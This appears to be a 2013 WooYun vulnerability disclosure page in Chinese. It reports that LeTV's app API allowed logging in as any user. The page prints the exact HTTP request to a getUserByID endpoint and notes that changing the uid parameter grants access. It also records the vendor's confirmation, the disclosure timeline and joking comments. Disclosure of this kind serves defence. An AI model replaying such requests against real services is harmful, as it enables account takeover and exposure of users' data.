当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041489

漏洞标题:乐视网2200万用户任意用户登录

相关厂商:乐视网

漏洞作者: zzR

提交时间:2013-10-30 17:29

修复时间:2013-12-14 17:30

公开时间:2013-12-14 17:30

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-30: 细节已通知厂商并且等待厂商处理中
2013-10-30: 厂商已经确认,细节仅向厂商公开
2013-11-09: 细节向核心白帽子及相关领域专家公开
2013-11-19: 细节向普通白帽子公开
2013-11-29: 细节向实习白帽子公开
2013-12-14: 细节向公众公开

简要描述:

最近比较关注,这可能是一个新的安全点!!!

详细说明:

乐视APP缺陷导致2000W用户任意登录
登录抓包吧

GET /android/dynamic.php?mod=passport&ctl=index&act=getUserByID&uid=2*&pcode=010210000&version=5.0 HTTP/1.1
Host: dynamic.app.m.letv.com
Connection: keep-alive
Accept-Language: zh-Hans;q=1, en;q=0.9, zh-Hant;q=0.8, fr;q=0.7, de;q=0.6, ja;q=0.5
User-Agent: LetvIphoneClient/5.0 (iPhone; iOS 7.0.3; Scale/2.00)


修改任意uid即可

漏洞证明:

看几张图片就行了
1#进个vip

vip.jpg


交易详情

vip2.jpg


2#第20000000用户

2kw.jpg


3#第一位内部用户

1.jpg

修复方案:

just the begining

版权声明:转载请注明来源 zzR@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-10-30 18:22

厂商回复:

感谢挖掘,此问题我们在筛查一下,尽快修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-10-30 17:31 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    mark

  2. 2013-10-30 17:41 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    纳尼?

  3. 2013-10-30 17:41 | 菊部地区有血 ( 路人 | Rank:4 漏洞数:1 | 广告位出租。。。)

    前排留名。。。。如果乐视网上市了,在让浑水的人拿这数据去干坏事情,然后股价就下来了,我们可以抄底了嘛?

  4. 2013-10-30 17:47 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @小胖子 小宝贝儿,快看看你的ran k

  5. 2013-10-30 17:48 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @菊部地区有血 想太多了小伙伴

  6. 2013-10-30 17:48 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @菊部地区有血 对于这种人我只想说 算我一个

  7. 2013-10-30 17:49 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @zzR 是你的rank~

  8. 2013-10-30 18:12 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    库被拖了?不是吧

  9. 2013-10-30 19:30 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    牛了

  10. 2013-10-30 21:29 | yhoojj ( 普通白帽子 | Rank:110 漏洞数:14 | BurNing)

    @小胖子 你们好基情~~

  11. 2013-10-30 21:32 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    刚吃完牛蛙回来,围观好基友。

  12. 2013-10-30 21:35 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @Mr.leo 吃牛蛙喊上我一个

  13. 2013-10-30 21:42 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @zzR 有妹子就有牛蛙

  14. 2013-10-30 21:48 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @Mr.leo 有牛蛙就有妹子 -0-

  15. 2013-10-30 22:00 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @zzR 成交

  16. 2013-10-30 22:01 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    私信,求细节

  17. 2013-12-15 12:23 | ieasyi ( 路人 | Rank:3 漏洞数:2 )

    私信,求细节

  18. 2014-02-26 17:54 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @zzR 请教手机上怎么抓包?